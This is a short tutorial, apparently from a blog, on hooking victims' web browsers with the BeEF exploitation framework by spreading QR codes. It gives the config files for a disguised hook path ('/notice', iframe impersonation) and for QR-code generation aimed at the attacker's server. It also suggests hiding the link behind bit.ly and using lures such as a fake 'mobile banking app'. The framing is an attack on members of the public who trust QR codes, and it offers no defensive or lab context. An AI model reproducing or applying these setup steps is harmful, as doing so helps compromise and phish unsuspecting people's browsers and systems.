For those unfamiliar with the Browser Exploitation Framework Project, or BeEF, it is a tool that can be used to launch attacks against the often only door left open, the web browser. Once the browser is compromised, BeEF can launch further attacks to control the system. While some of us know not to scan any QR code we find, most people assume that they are safe. You can find them posted all around. Sales circulars, marketing materials, magazines, they’re everywhere. Why not take advantage of that inherent trust?

For this tutorial, I’m going to assume that you are running Backtrack 5 R3 or Kali. If not, installation instructions can be found here.

customhook

First things first, we need to edit the customhook config. When BeEF fires up, it sets the hook location to your.i.p.address/hook/ which is pretty obvious. So by editing the config, we can set a custom name for our hook and make it a little less conspicuous. The config can be found at $BEEF_ROOT/extensions/customhook/config.yaml. Pop that open with your favorite editor and change the values to whatever you want. Its pretty self-explanatory.

#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
    extension:
        customhook:
            enable: true
            name: 'Custom Hook Point with iFrame Impersonation'
            customhook_path: "/notice"
            customhook_target: "http://heyyeyaaeyaaaeyaeyaa.com/"
            customhook_title: "Notice"

Make sure you set “enable:” to true.

qrcode

Next, we need to edit the qrcode extension’s config. All you need to do here is set “enable:” to true and set the “target:” to your customhook location (or a bit.ly link of it if you’re feeling extra sneaky ;) ). It can be found at $BEEF_ROOT/extensions/qrcode/config.yaml.

#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
    extension:
        qrcode:
            name: 'QR Code Generator'
            enable: true
            authors: ["xntrik"]
            target: ["mybeefserver.com/notice"]
            qrsize: "300x300"

Now when you start BeEF, it will generate a QR code for your hook. You can also append the URL of your customhook to https://chart.googleapis.com/chart?cht=qr&chs=300x300&chl= and it’ll generate a code for you.

Attack!

Once you fire up BeEF after making the changes, it will create your custom hook in the location your set as well as provide you a URL where you can download your QR code from. Now the only thing left to do is figure out how you want to use it. “Scan this to try our new mobile banking app for your iPhone!” The possibilities are endless.